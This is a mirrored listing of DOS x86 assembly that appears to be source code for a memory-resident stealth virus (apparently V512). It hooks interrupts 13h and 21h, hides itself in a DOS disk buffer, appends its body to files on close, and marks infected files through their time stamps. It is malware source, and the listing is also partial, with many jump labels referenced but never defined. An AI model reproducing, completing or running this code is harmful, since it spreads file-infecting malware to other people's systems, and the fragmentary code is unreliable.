mirror of
synced 2025-02-23 06:54:39 +00:00
313 lines
9.8 KiB
313 lines
9.8 KiB
name a
code1 segment byte
assume cs:code1,ds:code1
org 0004h
D4 = $
org 0050h
N50 = $
org 0100h
BegAddr = $
mov si,04h
mov ds,si
lds dx,dword ptr [si+08h] ; get addr of int 13h into ds:dx
mov ah,013h
int 02fh ; return orig addr of int 13 into ds:dx
push ds
push dx
int 02fh
pop ax
mov di,offset BegAddr-8
stosw ; store orig int13 addr offset
pop ax
stosw ; and segment
mov ds,si
lds ax,dword ptr [si+040h] ; get addr of int21 into ds:ax
cmp ax,0117h
stosw ; store int21 addr offset
mov ax,ds
stosw ; and segment
push es ; really this is prog_begin segment
push di ; and offset (0100 for .COM)
jne N130
shl si,1
mov cx,01ffh
rep cmpsb
je N177
mov ah,052h ; DOS Fn - Get LIST of LISTS
int 021h
push es ; return: es:bx - pointer to DOS list of lists
mov si,0f8h ; here was stored addres of int13
les di,es:[bx+12h] ; pointer to first disk buffer
mov dx,es:[di+02] ; pointer to next disk buffer
mov cx,207h ; VirLen + 8
rep movs byte ptr es:[di],byte ptr ss:[si] ; Move v512 into
; first disk buffer
mov ds,cx ; ds=0
mov di,016h
mov word ptr [di+06eh],0117h ; set int21 to this offset
mov word ptr [di+070h],es ; and segment
pop ds ; restore pointer to DOS list of lists into ds:bx
mov word ptr [bx+014h],dx ; set 2-nd disk buffer as first
; => hide 1-st disk buffer
mov dx,cs
mov ds,dx
mov bx,word ptr [di-014h] ; get top of available system
; memory in paragraphs
dec bh ; and decement it
mov es,bx ; es=last memory segment
cmp dx,word ptr [di] ; dx=Parents ID ?
mov ds,word ptr [di] ; ds=PID
mov dx,word ptr [di] ; dx=Parents PID !!!
dec dx
mov ds,dx ; ds=P PID-1 !!!
mov si,cx ; si=0
mov dx,di
mov cl,028h
rep movsw ; P PID-1:0 -> MemTop-1:16
mov ds,bx ; ds=MemTop-1
jb N186 ; ?????
mov si,cx ; si=0
mov ds,word ptr ss:[si+02ch] ; ds=Segment address of DOS environment
dec si
or ax,ax
jne N17d ; find filespec of THIS file !!!
lea dx,word ptr [si+03h] ; and move pointer to ds:dx (FoolBoy!)
mov ax,03d00h ; Open a File
int 021h ; AL Open mode
; DS:DX Pointer to filename (ASCIIZ string)
xchg ax,bx
pop dx
push dx
push cs
pop ds
push ds
pop es
mov cl,02h
mov ah,03fh
int 021h ; Read from File or Device, Using a Handle
; BX File handle
; CX Number of bytes to read
; DS:DX Address of buffer
mov dl,cl
xchg cl,ch
mov al,byte ptr ds:BegAddr
cmp al,byte ptr ds:D2ff
jne N1a7
mov ah,03fh
jmp N50
push bx
mov ax,01220h ; get system file table number
int 02fh ; bx = file handle
mov bl,byte ptr es:[di] ; = system file table entry number for
; file handle
mov ax,01216h ; get address of system fcb
int 02fh ; bx = system file table number
; return: ES:DI - system file table entry
pop bx
lea di,word ptr [di+015h]
mov bp,0200h
mov ah,03fh
push cs
call N248
call GetFileTblNum
mov si,word ptr es:[di]
call N1c0
jb N1f7
cmp si,bp
jnb N1f7
push ax
mov al,byte ptr es:[di-08h]
not al
and al,01fh
jne N1f6
add si,word ptr es:[di-04h]
xchg si,word ptr es:[di]
add word ptr es:[di-04h],bp
call N1c0
sub word ptr es:[di-04h],bp
xchg ax,si
pop ax
pop es
pop si
pop di
pop bp
boza proc far
ret 2
boza endp
DOS_QueryFileTimeDate: ; AL : 0 to query the time/date of a file
call N1c2
D200 = $-1
mov al,cl
and al,01fh
cmp al,01fh
D207 = $-1
jne N20c
xor cl,al
jmp N1f6
push bp
push di
push si
push es
mov bp,sp
mov es,word ptr [bp+0ah]
mov di,0117h
mov si,di
cmps word ptr cs:[si],word ptr es:[di]
je N244
cmp ah,03fh ; DOS Fn 3fH: Read from File via Handle
je DOS_ReadFromFile
push ax
cmp ax,05700h ; DOS Fn 57H: Set/Query File Time/Date
je DOS_QueryFileTimeDate
cmp ah,03eh ; DOS Fn 3eH: Close a File Handle
push bx
push cx
push dx
push ds
je DOS_CloseFileHandle
cmp ax,04b00h ; DOS Fn 4bH: Execute or Load a Program -- EXEC
pop ds
pop dx
pop cx
pop bx
je N1f6
pop ax
pop es
pop si
pop di
pop bp
jmp dword ptr cs:D4 ; ?????
mov ah,03dh ; DS:DX : address of an ASCIIZ string of a
int 021h ; filespec
; AL : Open Mode
xchg ax,bx
DOS_CloseFileHandle: ; BX : file handle
call GetFileTblNum
jb INT21end ; exit on error
xor cx,cx
xchg cx,bp
mov ds,bp
mov si,04ch
push ax
push ax
mov ax,02524h ; DOS Fn 25H: Set Interrupt Vector
push ax
push word ptr [si+040h]
push word ptr [si+042h]
push cs
pop ds ; AL : interrupt number 24h
; INT 24H: Critical Error Handler
mov dx,067h ; DS:DX : interrupt vector - address
int 021h ; of code to handle an interrupt
lds dx,dword ptr [si-050h]
mov al,013h ; AL : interrupt number 13h
int 021h ; INT 13H: Disk I/O
push es
pop ds
mov word ptr [di],bp
mov byte ptr [di-013h],ch
cmp word ptr [di+014h],04d4fh
jne N2be
mov dx,word ptr [di-04h]
add dh,ch
cmp dh,04h
jb N2be
test byte ptr [di-011h],04h
jne N2be
lds si,dword ptr [di-0eh]
cmp byte ptr [si+04h],ch
jbe N2aa
dec dx
shr dh,1
and dh,byte ptr [si+04h]
je N2be
mov ds,bp
mov dx,cx
call N1c0
mov si,dx
dec cx
cmp al,byte ptr cs:Dfe07[si]
jne N2d1
loop N2b4
mov ah,03eh
call N1c2
pop ds
pop dx
pop ax
int 021h
pop ds
pop dx
mov al,013h
int 021h
jmp INT21end
mov cx,dx
mov si,word ptr es:[di-04h]
mov word ptr es:[di],si
mov ah,040h
int 021h
mov al,byte ptr ds:D200
push es
pop ds
mov word ptr [di-04h],si
mov word ptr [di],bp
or byte ptr [di-08h],01fh
push cs
pop ds
mov byte ptr ds:D207,al
mov dx,08h
mov ah,040h
int 021h
or byte ptr es:[di-0fh],040h
jmp N2be
D2ff = $
db 0e9h
org 336h
N336 proc near
N336 endp
code1 ends
end begin